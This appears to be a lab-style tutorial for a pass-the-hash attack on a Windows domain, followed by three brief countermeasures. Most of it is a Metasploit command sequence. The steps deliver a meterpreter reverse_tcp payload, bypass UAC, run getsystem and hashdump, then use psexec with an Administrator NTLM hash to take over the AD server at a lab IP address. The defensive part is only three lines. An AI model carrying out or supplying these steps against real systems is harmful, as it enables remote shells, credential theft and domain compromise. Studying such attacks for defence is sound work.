Pass The Hash Attack
1. Create a payload and deliver to victim machine.
a. Msfconsole
b. Use exploit/multi/handler
c. Set Payload windows/meterpreter/reverse_tcp
d. Set LHOST 10.0.2.15
e. Exploit
2. Download and run the payload on the victim machine.
3. Once the reverse tcp connection is established and then escalate the privileges on the victim
a. Background
b. Search bypassuac
c. Use 4
d. Set SESSION 1
e. Exploit
4. After exploiting get the system and dump the hash
a. getsystem
b. hashdump
5. Now run a nmap scan for the available port on the server.
6. Since smb port 445 is open we can run powershell exploit and get access to the AD server.
a. Background
b. Search psexec
c. Use 11
d. Set RHOST 10.0.2.21
e. Set SMBDomain testdomain
f. Set SMBUser Administrator
g. Set SMBPass aad3b435b514eeaad3b435b51404ee:72f48f7cddfeaecd28166780f73
h. Exploit
i. Getsystem
Counter Measure:
1. Use Privilege Access Management(PAM) for login using privileged account so the password hashes are not stored in the local machine.
2. Always the workstation should be configured to latest patches and also have an endpoint security agent.
3. Use strong authentication with short life span.
Testimonials
